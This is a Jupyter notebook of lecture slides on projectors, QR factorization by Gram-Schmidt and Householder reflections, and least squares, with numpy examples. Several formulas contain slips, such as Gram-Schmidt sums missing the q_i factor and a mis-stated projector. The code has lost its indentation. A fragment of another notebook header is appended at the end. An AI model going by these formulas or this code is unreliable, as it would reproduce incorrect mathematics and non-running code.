# + [markdown] slideshow={"slide_type": "slide"}
# # QR Factorizations and Least Squares
# + [markdown] slideshow={"slide_type": "slide"}
# ## Projections
#
# A **projector** is a square matrix $P$ that satisfies
# $$
# P^2 = P.
# $$
#
# Why does this definition make sense? Why do we require it to be square?
# + [markdown] slideshow={"slide_type": "subslide"}
# A projector comes from the idea that we want to project a vector $v$ onto a lower dimensional subspace. Of course if $v$ lies completely within this subspace, i.e. $v \in \text{range}(P)$ then $P v = v$. This motivates the definition above.
#
# If $Pv = v'$ then $v'$ should already be in the sub-space so that subsequent applications of $P$ should result in no change, i.e.
# $$
# P( Pv ) = Pv' = v'.
# $$
# + [markdown] slideshow={"slide_type": "subslide"}
# As another example, take a vector $x \notin \text{range}(P)$ and project it onto the subspace $Px = v$. If we apply the projection again to $v$ now we have
#
# $$\begin{aligned}
# Px &= v \\
# P^2 x & = Pv = v \Rightarrow \\
# P^2 &= P.
# \end{aligned}$$
# + [markdown] slideshow={"slide_type": "subslide"}
# It is also important to keep in mind the following, given again $x \notin \text{range}(P)$, if we look at the difference between the projection and the original vector $Px - x$ and apply the projection again we have
# $$
# P(Px - x) = P^2 x - Px = 0
# $$
# which means the difference between the projected vector $Px = v$ lies in the null space of $P$, $v \in \text{null}(P)$.
# + [markdown] slideshow={"slide_type": "subslide"}
# ### Complementary Projectors
#
# A projector also has a complement defined as $I - P$.
#
# Show that this complement is also a projector.
# + [markdown] slideshow={"slide_type": "subslide"}
# We can show that again this a projector as
#
# $$\begin{aligned}
# (I - P)^2 &= I - IP - IP + P^2 \\
# &= I - 2 P + P^2 \\
# &= I - 2P + P \\
# &= I - P.
# \end{aligned}$$
# + [markdown] slideshow={"slide_type": "subslide"}
# It turns out that the complement projects exactly onto $\text{null}(P)$.
#
# Take
# $$
# x \in \text{null}(P),
# $$
# then
# $$
# (I - P) x = x - P x = x
# $$
# since $P x = 0$ implying that $x \in \text{range}(I - P)$.
# + [markdown] slideshow={"slide_type": "subslide"}
# We also know that
# $$
# (I - P) x \in \text{null}(P)
# $$
# as well.
#
# This shows that the
# $$
# \text{range}(I - P) \subseteq \text{null}(P)
# $$
# and
# $$
# \text{range}(I - P) \supseteq \text{null}(P)
# $$
# implying that
# $$
# \text{range}(I - P) = \text{null}(P)
# $$
# exactly.
#
# Reflect on these subspaces and convince yourself that this all makes sense.
# + [markdown] slideshow={"slide_type": "subslide"}
# This result provides an important property of a projector and its complement, namely that they divide a space into two subspaces whose intersection is
# $$
# \text{range}(I - P) \cap \text{range}(P) = \{0\}
# $$
# or
# $$
# \text{null}(P) \cap \text{range}(P) = \{0\}
# $$
# These two spaces are called **complementary subspaces**.
# + [markdown] slideshow={"slide_type": "subslide"}
# Given this property we can take any $P \in \mathbb C^{m \times m}$ which will split $\mathbb C^{m \times m}$ into two subspaces $S$ and $V$, assume that $s \in S = \text{range}(P)$, and $v \in V = \text{null}(P)$. If we have $x \in \mathbb C^{m \times m}$ that we can split the vector $x$ into components in $S$ and $V$ by using the projections
# $$\begin{aligned}
# P x = x_S& &x_s \in S \\
# (I - P) x = x_V& &x_V \in V
# \end{aligned}$$
# which we can also observe adds to the original vector as
# $$
# x_S + x_V = P x + (I - P) x = x.
# $$
#
# Try constructing a projection matrix so that $P \in \mathbb R^3$ that projects a vector into one of the coordinate directions ($\mathbb R$).
# - What is the complementary projector?
# - What is the complementary subspace?
# + [markdown] slideshow={"slide_type": "subslide"}
# ### Orthogonal Projectors
#
# An **orthogonal projector** is one that projects onto a subspace $S$ that is orthogonal to the complementary subspace $V$ (this is also phrased that $S$ projects along a space $V$). Note that we are only talking about the subspaces (and their basis), not the projectors!
# + [markdown] slideshow={"slide_type": "subslide"}
# A **hermitian** matrix is one whose complex conjugate is itself, i.e.
# $$
# P = P^\ast.
# $$
#
# With this definition we can then say: *A projector $P$ is orthogonal if and only if $P$ is hermitian.*
# + [markdown] slideshow={"slide_type": "subslide"}
# ### Projection with an Orthonormal Basis
#
# We can also directly construct a projector that uses an orthonormal basis on the subspace $S$. If we define another matrix $Q \in \mathbb C^{m \times n}$ which is unitary (its columns are orthonormal) we can construct an orthogonal projector as
# $$
# P = Q Q^*.
# $$
# Note that the resulting matrix $P$ is in $\mathbb C^{m \times m}$ as we require. This means also that the dimension of the subspace $S$ is $n$.
# + [markdown] slideshow={"slide_type": "subslide"}
# **Example: Construction of an orthonormal projector**
#
# Take $\mathbb R^3$ and derive a projector that projects onto the x-y plane and is an orthogonal projector.
# + [markdown] slideshow={"slide_type": "subslide"}
# $$
# Q = \begin{bmatrix} 1 & 0 \\
# 0 & 1 \\
# 0 & 0
# \end{bmatrix}, \quad
# Q Q^\ast = \begin{bmatrix} 1 & 0 \\
# 0 & 1 \\
# 0 & 0
# \end{bmatrix}
# \begin{bmatrix} 1 & 0 & 0 \\
# 0 & 1 & 0
# \end{bmatrix} = \begin{bmatrix}
# 1 & 0 & 0 \\
# 0 & 1 & 0 \\
# 0 & 0 & 0
# \end{bmatrix}
# $$
# + slideshow={"slide_type": "skip"}
Q = numpy.array([[1, 0],[0, 1],[0, 0]])
P = numpy.dot(Q, numpy.conjugate(numpy.transpose(Q)))
I = numpy.identity(3)
x = numpy.array([3, 4, 5])
x_S = numpy.dot(P, x)
x_V = numpy.dot(I - P, x)
print(x)
print(x_S)
print(x_V)
print(x_S + x_V)
# + [markdown] slideshow={"slide_type": "subslide"}
# #### Example: Construction of a projector that eliminates a direction
#
# Goal: Eliminate the component of a vector in the direction $q$.
#
# Form the projector $P = q q^\ast \in \mathbb C^{m \times m}$. The complement $I - P$ will then include everything **BUT** that direction. If $||q|| = 1$ we can then simply use $I - q q^\ast$. If not we can write the projector in terms of the arbitrary vector $a$ as
# $$
# I - \frac{a a^\ast}{||a||} = I - \frac{a a^\ast}{a^\ast a}
# $$
# Note that differences in the resulting dimensions between the two values in the fraction. Also note that as we saw with the outer product, the resulting $\text{rank}(a a^\ast) = 1$.
#
# Now again try to construct a projector in $\mathbb R^3$ that projects onto the $x$-$y$ plane.
# + slideshow={"slide_type": "skip"}
q = numpy.array([0, 0, 1])
P = numpy.outer(q, q.conjugate())
P_comp = numpy.identity(3) - P
x = numpy.array([3, 4, 5])
print(numpy.dot(P, x))
print(numpy.dot(P_comp, x))
a = numpy.array([0, 0, 3])
P = numpy.outer(a, a.conjugate()) / (numpy.dot(a, a.conjugate()))
P_comp = numpy.identity(3) - P
print(numpy.dot(P, x))
print(numpy.dot(P_comp, x))
# + [markdown] slideshow={"slide_type": "slide"}
# ## QR Factorization
#
# One of the most important ideas in linear algebra is the concept of factorizing an original matrix into different constituents that may have useful properties. These properties can help us understand the matrix better and lead to numerical methods. In numerical linear algebra one of the most important factorizations is the **QR factorization**.
# + [markdown] slideshow={"slide_type": "subslide"}
# The basic idea is that we want to break up $A$ into its successive spaces spanned by the columns of $A$. If we have
# $$
# A = \begin{bmatrix} & & \\ & & \\ a_1 & \cdots & a_n \\ & & \\ & & \end{bmatrix}
# $$
# then we want to construct the sequence
# $$
# \text{span}(a_1) \subseteq \text{span}(a_1, a_2) \subseteq \text{span}(a_1, a_2, a_3) \subseteq \cdots \subseteq \text{span}(a_1, a_2, \ldots , a_n)
# $$
# where here $\text{span}(v_i)$ indicates the subspace spanned by the vectors $v_i$.
# + [markdown] slideshow={"slide_type": "subslide"}
# QR factorization attempts to construct a set of orthonormal vectors $q_i$ that span each of the subspaces, i.e.
# $$
# \text{span}(a_1, a_2, \ldots, a_j) = \text{span}(q_1, q_2, \ldots, q_j).
# $$
# + [markdown] slideshow={"slide_type": "subslide"}
# Lets consider this for the first few vectors $q_i$.
# 1. For $\text{span}(a_1)$ we can directly use $a_1$ but normalize the vector such that
# $$
# q_1 = \frac{a_1}{||a_1||}.
# $$
# + [markdown] slideshow={"slide_type": "subslide"}
# 2. For $\text{span}(a_1, a_2)$ we already have $q_1$ so we need to have a vector $q_2$ that is orthogonal to $q_1$, i.e.
# $$
# \langle q_1, q_2 \rangle = q_1^* q_2 = 0
# $$
# and is again normalized. We can accomplish this by modifying $a_2$ such that
# $$
# q_2 = \frac{a_2 - \langle q_1, a_2\rangle}{||a_2 - \langle q_1, a_2\rangle||}.
# $$
# which we can show is orthogonal to $q_1$ as
# $$\begin{aligned}
# \langle q_1, q_2 \rangle &= \left(\langle q_1, a_2 - \langle q_1, a_2 \rangle \rangle \right) \frac{1}{||a_2 - \langle q_1, a_2 \rangle||} \\
# &= \left(\langle q_1, a_2 \rangle - \langle q_1, a_2 \rangle\right) \frac{1}{||a_2 - \langle q_1, a_2 \rangle||} \\
# &= 0.
# \end{aligned}$$
# + [markdown] slideshow={"slide_type": "subslide"}
# These results suggest then that we may have a matrix factorization that has the following form:
# $$
# \begin{bmatrix} & & \\ & & \\ a_1 & \cdots & a_n \\ & & \\ & & \end{bmatrix} =
# \begin{bmatrix} & & \\ & & \\ q_1 & \cdots & q_n \\ & & \\ & & \end{bmatrix}
# \begin{bmatrix} r_{11} & r_{12} & \cdots & r_{1n} \\ & r_{22} & & \\ & & \ddots & \vdots \\ & & & r_{nn} \end{bmatrix}.
# $$
# If we write this out as a matrix multiplication we have
# $$\begin{aligned}
# a_1 &= r_{11} q_1 \\
# a_2 &= r_{22} q_2 + r_{12} q_1 \\
# a_3 &= r_{33} q_3 + r_{23} q_2 + r_{13} q_1 \\
# &\vdots
# \end{aligned}$$
# We can also identify at least the first couple of values of $r$ as
# $$\begin{aligned}
# r_{11} &= \left \Vert a_1 \right \Vert \\
# r_{12} &= \langle q_1, a_2 \rangle \\
# r_{22} &= \left \Vert a_2 - r_{12} q_1 \right \Vert
# \end{aligned}$$
# It turns out we can generalize this as Gram-Schmidt orthogonalization.
# + [markdown] slideshow={"slide_type": "subslide"}
# ### Gram-Schmidt Orthogonalization
#
# As may have been suggestive we can directly construct the arrays $Q$ and $R$ via a process of successive orthogonalization. We have already shown the first two iterations so lets now consider the $j$th iteration.
# + [markdown] slideshow={"slide_type": "subslide"}
# We want to subtract off the components of the vector $a_j$ in the direction of the $q_i$ vectors where $i=1,\ldots,j-1$. This suggests that we define a vector $v_j$ such that
# $$\begin{aligned}
# v_j &= a_j - \langle q_1, a_j \rangle - \langle q_2, a_j \rangle - \quad \cdots \quad- \langle q_{j-1}, a_j \rangle \\
# &= a_j - \sum^{j-1}_{i=1} \langle q_i, a_j \rangle.
# \end{aligned}$$
#
# We also need to normalize $v_j$ which allows to define the $j$th column of $Q$ as
# $$
# q_j = \frac{a_j - \sum^{j-1}_{i=1} \langle q_i, a_j \rangle}{\left \Vert a_j - \sum^{j-1}_{i=1} \langle q_i, a_j \rangle \right \Vert}.
# $$
# + [markdown] slideshow={"slide_type": "subslide"}
# We can also discern what the entries of $R$ are as we can write the matrix multiplication as the sequence
# $$\begin{aligned}
# q_1 &= \frac{a_1}{r_{11}} \\
# q_2 &= \frac{a_2 - r_{12} q_1}{r_{22}} \\
# q_3 &= \frac{a_3 - r_{13} q_1 - r_{23} q_2}{r_{33}} \\
# &\vdots \\
# q_n &= \frac{a_n - \sum^{n-1}_{i=1} r_{in} q_i}{r_{nn}}
# \end{aligned}$$
# leading us to define
# $$
# r_{ij} = \left \{ \begin{aligned}
# &\langle q_i, a_j \rangle & &i \neq j \\
# &\left \Vert a_j - \sum^{j-1}_{i=1} r_{ij} q_i \right \Vert & &i = j
# \end{aligned} \right .
# $$
#
# This is called the **classical Gram-Schmidt** iteration. Turns out that the procedure above is unstable because of rounding errors introduced.
# + slideshow={"slide_type": "skip"}
# Implement Classical Gram-Schmidt Iteration
def classic_GS(A):
m = A.shape[0]
n = A.shape[1]
Q = numpy.empty((m, n))
R = numpy.zeros((n, n))
for j in range(n):
v = A[:, j]
for i in range(j):
R[i, j] = numpy.dot(Q[:, i].conjugate(), A[:, j])
v = v - R[i, j] * Q[:, i]
R[j, j] = numpy.linalg.norm(v, ord=2)
Q[:, j] = v / R[j, j]
return Q, R
A = numpy.array([[12, -51, 4], [6, 167, -68], [-4, 24, -41]], dtype=float)
Q, R = classic_GS(A)
print(A)
print(Q)
print(numpy.dot(Q.transpose(), Q))
print(R)
print(numpy.dot(Q, R) - A)
# + [markdown] slideshow={"slide_type": "subslide"}
# #### Full vs. Reduced QR
#
# If the original matrix $A \in \mathbb C^{m \times n}$ where $m \ge n$ then we can still define a QR factorization, called the **full QR factorization**, which appends columns full of zeros to $R$ to reproduce the full matrix.
# $$
# A = Q R = \begin{bmatrix} Q_1 & Q_2 \end{bmatrix}
# \begin{bmatrix} R_1 \\
# 0
# \end{bmatrix} = Q_1 R_1
# $$
# The factorization $Q_1 R_1$ is called the **reduced** or **thin QR factorization** of $A$.
#
# We require that the additional columns added $Q_2$ are an orthonormal basis that is orthogonal itself to $\text{range}(A)$. If $A$ is full ranked then $Q_1$ and $Q_2$ provide a basis for $\text{range}(A)$ and $\text{null}(A^\ast)$ respectively.
# + [markdown] slideshow={"slide_type": "subslide"}
# #### QR Existence and Uniqueness
# Two important theorems exist regarding this algorithm which we state without proof:
#
# *Every $A \in \mathbb C^{m \times n}$ with $m \geq n$ has a full QR factorization and therefore a reduced QR factorization.*
#
# *Each $A \in \mathbb C^{m \times n}$ with $m \geq n$ of full rank has a unique reduced QR factorization $A = QR$ with $r_{jj} > 0$.*
# + [markdown] slideshow={"slide_type": "subslide"}
# #### Gram-Schmidt in Terms of Projections
#
# To start lets rewrite classical Gram-Schmidt as a series of projections:
# $$
# q_1 = \frac{P_1 a_1}{||P_1 a_1||}, \quad q_2 = \frac{P_2 a_2}{||P_2 a_2||}, \quad \cdots \quad q_n = \frac{P_n a_n}{||P_n a_n||}
# $$
# where the $P_i$ are orthogonal projectors onto the $q_1, q_2, \ldots, q_{i-1}$, in other words the complement of $\text{span}(a_1, a_2, \ldots, a_{i-1})$.
#
# How should we construct these projectors?
# + [markdown] slideshow={"slide_type": "subslide"}
# We saw before that we can easily construct an orthogonal projector onto the complement of a space by first constructing the projector onto the space itself via
# $$
# \hat{\!Q}_{i-1} = \begin{bmatrix}
# & & & \\
# & & & \\
# q_1 & q_2 & \cdots & q_{i-1} \\
# & & & \\
# & & &
# \end{bmatrix}.
# $$
# Constructing the projection onto the space spanned by $q_1$ through $q_{i-1}$ is then
# $$
# \hat{\!P}_{i-1} = \hat{\!Q}_{i-1} \hat{\!Q}^\ast_{i-1}
# $$
# and therefore the projections in Gram-Schmidt orthogonalization is
# $$
# P_{i} = I - \hat{\!P}_{i-1} = I - \hat{\!Q}_{i-1} \hat{\!Q}^\ast_{i-1}.
# $$
# + [markdown] slideshow={"slide_type": "subslide"}
# #### Modified Gram-Schmidt
#
# One problem with the original Gram-Schmidt algorithm is it is not stable numerically. Instead we can derive a modified method that is more numerically stable.
# + [markdown] slideshow={"slide_type": "subslide"}
# Recall that the basic piece of the original algorithm was to take the inner product of $a_j$ and all the relevant $q_i$. Using the rewritten version of Gram-Schmidt in terms of projections we then have
#
# $$
# v_i = P_i a_i.
# $$
# + [markdown] slideshow={"slide_type": "subslide"}
# This projection is of rank $m - (i - 1)$ as we know that the resulting $v_i$ are linearly independent by construction. The modified version of Gram-Schmidt instead uses projections that are all of rank $m-1$. To construct this projection remember that we can again construct the complement to a projection and perform the following sequence of projections
#
# $$
# P_i = \hat{\!P}_{q_{i-1}} \hat{\!P}_{q_{i-2}} \cdots \hat{\!P}_{q_{2}} \hat{\!P}_{q_{1}}
# $$
#
# where $\hat{\!P}_{q_{i}}$ projects onto the complement of the space spanned by $q_i$. Note that this performs mathematically the same job as $P_i a_i$ however each of these projectors are of rank $m - 1$.
# + [markdown] slideshow={"slide_type": "subslide"}
# This leads to the following set of calculations:
#
# $$\begin{aligned}
# 1.\quad v^{(1)}_i &= a_i \\
# 2.\quad v^{(2)}_i &= \hat{\!P}_{q_1} v_i^{(1)} = v^{(1)}_i - q_1 q_1^\ast v^{(1)}_i \\
# 3.\quad v^{(3)}_i &= \hat{\!P}_{q_2} v_i^{(2)} = v^{(2)}_i - q_2 q_2^\ast v^{(2)}_i \\
# & \text{ } \vdots & &\\
# i.\quad v^{(i)}_i &= \hat{\!P}_{q_{i-1}} v_i^{(i-1)} = v_i^{(i-1)} - q_{i-1} q_{i-1}^\ast v^{(i-1)}_i
# \end{aligned}$$
#
# The reason why this approach is more stable is that we are not projecting with a possibly arbitrarily low-rank projector, instead we only take projectors that are high-rank.
# + [markdown] slideshow={"slide_type": "subslide"}
# **Example: Implementation of modified Gram-Schmidt**
# Implement the modified Gram-Schmidt algorithm checking to make sure the resulting factorization has the required properties.
# + slideshow={"slide_type": "skip"}
# Implement Modified Gram-Schmidt Iteration
def mod_GS(A):
m = A.shape[0]
n = A.shape[1]
Q = numpy.empty((m, n))
R = numpy.zeros((n, n))
v = A.copy()
for i in range(n):
R[i, i] = numpy.linalg.norm(v[:, i], ord=2)
Q[:, i] = v[:, i] / R[i, i]
for j in range(i + 1, n):
R[i, j] = numpy.dot(Q[:, i].conjugate(), v[:, j])
v[:, j] -= R[i, j] * Q[:, i]
return Q, R
A = numpy.array([[12, -51, 4], [6, 167, -68], [-4, 24, -41]], dtype=float)
print(A)
Q, R = mod_GS(A)
print(R)
print(numpy.dot(Q.transpose(), Q))
print("Modified = ")
print(numpy.dot(Q, R) - A)
# + [markdown] slideshow={"slide_type": "subslide"}
# ### Householder Triangularization
#
# One way to also interpret Gram-Schmidt orthogonalization is as a series of multiplications by upper triangular matrices of the matrix A. For instance the first step in performing the modified algorithm is to divide through by the norm $r_{11} = ||v_1||$ to give $q_1$:
#
# $$
# \begin{bmatrix}
# & & & \\
# & & & \\
# v_1 & v_2 & v_3 & \cdots & v_n \\
# & & & \\
# & & &
# \end{bmatrix}
# \begin{bmatrix}
# \frac{1}{r_{11}} & &\cdots & \\
# & 1 & \\
# & & \ddots & \\
# & & & 1
# \end{bmatrix} =
# \begin{bmatrix}
# & & & \\
# & & & \\
# q_1 & v_2 & v_3 & \cdots & v_n \\
# & & & \\
# & & &
# \end{bmatrix}
# $$
# + [markdown] slideshow={"slide_type": "subslide"}
# We can also perform all the step (2) evaluations by also combining the step that projects onto the complement of $q_1$ by add the appropriate values to the entire first row:
#
# $$
# \begin{bmatrix}
# & & & \\
# & & & \\
# v_1 & v_2 & v_3 & \cdots & v_n \\
# & & & \\
# & & &
# \end{bmatrix}
# \begin{bmatrix}
# \frac{1}{r_{11}} & -\frac{r_{12}}{r_{11}} & -\frac{r_{13}}{r_{11}} & \cdots \\
# & 1 & \\
# & & \ddots & \\
# & & & 1
# \end{bmatrix} =
# \begin{bmatrix}
# & & & \\
# & & & \\
# q_1 & v_2^{(2)} & v_3^{(2)} & \cdots & v_n^{(2)} \\
# & & & \\
# & & &
# \end{bmatrix}
# $$
# + [markdown] slideshow={"slide_type": "subslide"}
# The next step can then be placed into the second row:
# $$
# \begin{bmatrix}
# & & & \\
# & & & \\
# v_1 & v_2 & v_3 & \cdots & v_n \\
# & & & \\
# & & &
# \end{bmatrix}
# \cdot R_1 \cdot
# \begin{bmatrix}
# 1 & & & & \\
# & \frac{1}{r_{22}} & -\frac{r_{23}}{r_{22}} & -\frac{r_{25}}{r_{22}} & \cdots \\
# & & 1 & \\
# & & & \ddots & \\
# & & & & 1
# \end{bmatrix} =
# \begin{bmatrix}
# & & & \\
# & & & \\
# q_1 & q_2 & v_3^{(3)} & \cdots & v_n^{(3)} \\
# & & & \\
# & & &
# \end{bmatrix}
# $$
# + [markdown] slideshow={"slide_type": "subslide"}
# If we identify the matrices as $R_1$ for the first case, $R_2$ for the second case and so on we can write the algorithm as
#
# $$
# A \underbrace{R_1R_2 \quad \cdots \quad R_n}_{\hat{R}^{-1}} = \hat{\!Q}.
# $$
#
# This view of Gram-Schmidt is called Gram-Schmidt triangularization.
# + [markdown] slideshow={"slide_type": "subslide"}
# Householder triangularization is similar in spirit. Instead of multiplying $A$ on the right Householder multiplies $A$ on the left by unitary matrices $Q_k$. Remember that a unitary matrix (or an orthogonal matrix when strictly real) has as it's inverse it's adjoint (transpose when real) $Q^* = Q^{-1}$ so that $Q^* Q = I$. We therefore have
#
# $$
# Q_n Q_{n-1} \quad \cdots \quad Q_2 Q_1 A = R
# $$
#
# which if we identify $Q_n Q_{n-1} \text{ } \cdots \text{ } Q_2 Q_1 = Q^*$ and note that if $Q = Q^\ast_n Q^\ast_{n-1} \text{ } \cdots \text{ } Q^\ast_2 Q^\ast_1$ then $Q$ is also unitary.
# + [markdown] slideshow={"slide_type": "subslide"}
# We can then write this as
# $$\begin{aligned}
# Q_n Q_{n-1} \text{ } \cdots \text{ } Q_2 Q_1 A &= R \\
# Q_{n-1} \cdots Q_2 Q_1 A &= Q^\ast_n R \\
# & \text{ } \vdots \\
# A &= Q^\ast_1 Q^\ast_2 \text{ } \cdots \text{ } Q^\ast_{n-1} Q^\ast_n R \\
# A &= Q R
# \end{aligned}$$
# + [markdown] slideshow={"slide_type": "subslide"}
# This was we can think of Householder triangularization as one of introducing zeros into $A$ via orthogonal matrices.
#
# $$
# \begin{bmatrix}
# \text{x} & \text{x} & \text{x} \\
# \text{x} & \text{x} & \text{x} \\
# \text{x} & \text{x} & \text{x} \\
# \text{x} & \text{x} & \text{x} \\
# \end{bmatrix} \overset{Q_1}{\rightarrow}
# \begin{bmatrix}
# \text{x} & \text{x} & \text{x} \\
# 0 & \text{x} & \text{x} \\
# 0 & \text{x} & \text{x} \\
# 0 & \text{x} & \text{x} \\
# \end{bmatrix} \overset{Q_2}{\rightarrow}
# \begin{bmatrix}
# \text{x} & \text{x} & \text{x} \\
# 0 & \text{x} & \text{x} \\
# 0 & 0 & \text{x} \\
# 0 & 0 & \text{x} \\
# \end{bmatrix} \overset{Q_3}{\rightarrow}
# \begin{bmatrix}
# \text{x} & \text{x} & \text{x} \\
# 0 & \text{x} & \text{x} \\
# 0 & 0 & \text{x} \\
# 0 & 0 & 0\\
# \end{bmatrix}
# $$
# + [markdown] slideshow={"slide_type": "subslide"}
# Now the question is how do we construct the $Q_k$. The construction is usually broken down into a matrix of the form
#
# $$
# Q_k = \begin{bmatrix} I & 0 \\ 0 & F \end{bmatrix}
# $$
#
# where $I \in \mathbb C^{k-1 \times k-1}$ identity matrix and $F \in \mathbb C^{m - (k - 1) \times m - (k-1)}$ unitary matrix. Note that this will leave the rows and columns we have already worked on alone and be unitary.
# + [markdown] slideshow={"slide_type": "subslide"}
# To construct $F$ consider the transformation that reflects the vector $x$ over the plane $H$ so that $F x = v = ||x|| e_1$:
# 
# or mathematically
# $$
# x = \begin{bmatrix}
# \text{x} \\
# \text{x} \\
# \text{x} \\
# \text{x}
# \end{bmatrix} \overset{F}{\rightarrow}
# Fx = \begin{bmatrix}
# ||x|| \\
# 0 \\
# 0 \\
# 0
# \end{bmatrix} = ||x|| e_1.
# $$
# + [markdown] slideshow={"slide_type": "subslide"}
# This is of course the effect on only one vector. Any other vector will be reflected across $H$ (technically a hyperplane) which is orthogonal to $v = ||x|| e_1 - x$. This has a similar construction as to the projector complements we were working with before. Consider the projector defined as
#
# $$
# P x = \left (I - \frac{v v^\ast}{v^\ast v}\right) x = x - x \left(\frac{v^\ast x}{v^\ast v} \right),
# $$
#
# the complement of a projection in the direction of the vector $v$, in other words in the direction of $H$ above. Since we actually want to transform $x$ to lie in the direction of $e_1$ we need to go twice as far as just the projection onto $H$. This allows us to identify the matrix $F$ as
#
# $$
# F = I - 2 \frac{v v^\ast}{v^\ast v}.
# $$
# + [markdown] slideshow={"slide_type": "subslide"}
# There is actually a non-uniqueness to which direction we reflect over since another definition of $\hat{H}$ which is orthogonal to the one we originally choose is available. For numerical stability purposes we will choose the reflector that is the most different from $x$. This comes back to having difficulties numerically when the vector $x$ is nearly aligned with $e_1$ and therefore one of the $H$ specification. By convention the $v$ chosen is defined by
#
# $$
# v = \text{sign}(x_1)||x|| e_1 + x.
# $$
# + slideshow={"slide_type": "skip"}
# Implementation of Householder QR Factorization
def householder_QR(A, verbose=False):
R = A.copy()
v = numpy.empty(A.shape)
m, n = A.shape
for k in range(n):
x = R[k:, k]
e1 = numpy.zeros(x.shape)
e1[0] = 1.0
v[k:, k] = numpy.sign(x[0]) * numpy.linalg.norm(x, ord=2) * e1 + x
v[k:, k] = v[k:, k] / numpy.linalg.norm(v[k:, k], ord=2)
R[k:, k:] -= 2.0 * numpy.dot(numpy.outer(v[k:, k], v[k:, k]), R[k:, k:])
# Form Q
m, n = A.shape
Q = numpy.zeros(A.shape)
for i in range(n):
en = numpy.zeros(m)
en[i] = 1.0
for j in range(n - 1, -1, -1):
en[j:m] -= 2.0 * numpy.dot(numpy.outer(v[j:, j], v[j:, j]), en[j:m])
Q[:, i] = en
return Q, R
A = numpy.array([[12, -51, 4], [6, 167, -68], [-4, 24, -41]], dtype=float)
print("Matrix A = ")
print(A)
m, n = A.shape
Q, R = householder_QR(A, verbose=False)
print("Householder (reduced) Q = ")
print(Q)
print("Householder (full) R = ")
print(R)
print("Check to see if factorization worked...")
print(numpy.abs(A - numpy.dot(Q, R[:n, :n])))
# + [markdown] slideshow={"slide_type": "subslide"}
# In the above algorithm we do not need to explicitly form the matrix $Q$ to save memory and computation. If we wanted to for instance solve $A x = b$ we again have
#
# $$\begin{aligned}
# A x &= b \\
# Q R x &= b \\
# Rx &= Q^\ast b.
# \end{aligned}$$
#
# This requires then the multiplication $Q^\ast b$. To do this we just need to recognize that the vectors $v$ we save specify the $Q_k$ so we can form the matrices $F$ and multiply the vector directly with the $v_k$s:
# + [markdown] slideshow={"slide_type": "subslide"}
# #### Example 1: Random Matrix QR
#
# Consider a matrix $A$ with a random eigenspace and widely varying eigenvalues. The values along the diagonal of $R$ gives us some idea of the size of the projections as we go, i.e. the larger the values the less effective we are in constructing othorgonal directions.
# + slideshow={"slide_type": "skip"}
N = 80
U, X = numpy.linalg.qr(numpy.random.random((N, N)))
V, X = numpy.linalg.qr(numpy.random.random((N, N)))
S = numpy.diag(2.0**numpy.arange(-1.0, -(N + 1), -1.0))
A = numpy.dot(U, numpy.dot(S, V))
fig = plt.figure()
axes = fig.add_subplot(1, 1, 1)
Q, R = classic_GS(A)
axes.semilogy(numpy.diag(R), 'bo', label="Classic")
Q, R = mod_GS(A)
axes.semilogy(numpy.diag(R), 'ro', label="Modified")
Q, R = householder_QR(A)
axes.semilogy(numpy.diag(R), 'ko', label="Householder")
axes.set_xlabel("Index")
axes.set_ylabel("$R_{ii}$")
axes.legend(loc=3)
axes.plot(numpy.arange(0, N), numpy.ones(N) * numpy.sqrt(numpy.finfo(float).eps), 'k--')
axes.plot(numpy.arange(0, N), numpy.ones(N) * numpy.finfo(float).eps, 'k--')
plt.show()
# + [markdown] slideshow={"slide_type": "subslide"}
# #### Example 2: Comparing Orthogonality
#
# Consider
# $$
# A = \begin{bmatrix}
# 0.70000 & 0.70711 \\ 0.70001 & 0.70711
# \end{bmatrix}.
# $$
# Check that the matrix $Q$ is really unitary given this matrix.
# + slideshow={"slide_type": "skip"}
# %precision 16
A = numpy.array([[0.7, 0.70711], [0.70001, 0.70711]])
Q, R = classic_GS(A)
print("Classic: ", numpy.linalg.norm(numpy.dot(Q.transpose(), Q) - numpy.eye(2)))
Q, R = mod_GS(A)
print("Modified: ", numpy.linalg.norm(numpy.dot(Q.transpose(), Q) - numpy.eye(2)))
Q, R = householder_QR(A)
print("Housholder:", numpy.linalg.norm(numpy.dot(Q.transpose(), Q) - numpy.eye(2)))
Q, R = numpy.linalg.qr(A)
print("Numpy: ", numpy.linalg.norm(numpy.dot(Q.transpose(), Q) - numpy.eye(2)))
# + [markdown] slideshow={"slide_type": "subslide"}
# ### Applications of QR
#
# #### Solving $Ax = b$ with QR
#
# Suppose we want to solve the system $Ax = b$ where $A \in \mathbb C^{m \times m}$. See if you can figure out how to use a QR factorization to help with this.
# + [markdown] slideshow={"slide_type": "subslide"}
# Say we have found the QR factorization of $A$, then
# $$\begin{aligned}
# A x &= b \\
# QR x & = b \\
# Q^\ast Q R x &= Q^\ast b \\
# R x &= Q^\ast b.
# \end{aligned}$$
# Given that $R$ is upper triangular we can use back-substitution to find b.
# + [markdown] slideshow={"slide_type": "subslide"}
# #### Applications: Least Squares Problems
#
# Least squares problems have already been introduced but lets consider how our QR factorizations might help us. As before the least squares problem is characterized by wanting to find the $b$ such that $||b - Ax||_2$ is minimized over $x \in \mathbb C^n$.
# + [markdown] slideshow={"slide_type": "subslide"}
# Since we are using the $\ell_2$ norm and know this is equivalent to the Euclidean norm we know that there is a geometric interpretation to this goal, find the vector $x$ that gives the minimum distance between the vector $b$ and $A x$. This can be interpreted as a projection:
# 
# where
# $$
# r = b - Ax
# $$
# and
# $$
# y = Ax = Pb.
# $$
# The vector $r$ is called the residual (and the thing we are trying to minimize). $P$ represents the orthogonal projector onto the $\text{range}(A)$.
# + [markdown] slideshow={"slide_type": "subslide"}
# QR factorization plays a role similar to the ideas we saw from Householder triangularization. Define the orthogonal projector $P = Q Q^\ast$ based on the reduced QR factorization of $A$. We know then that the projector projects onto the span of column space of $A$ ($\text{span}(A)$). Using this QR factorization we know that the least-squares formulation then becomes
# $$\begin{aligned}
# A^\ast A x &= A^\ast b \\
# R^\ast Q^\ast Q R x &= R^\ast Q^\ast b \\
# R^\ast R x & = R^\ast Q^\ast b \\
# R x & = Q^\ast b
# \end{aligned}$$
# reducing the least-squares calculation to one of finding the QR factorization and backwards substitution.
|
11_LA_QR.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # Scaling Data
#
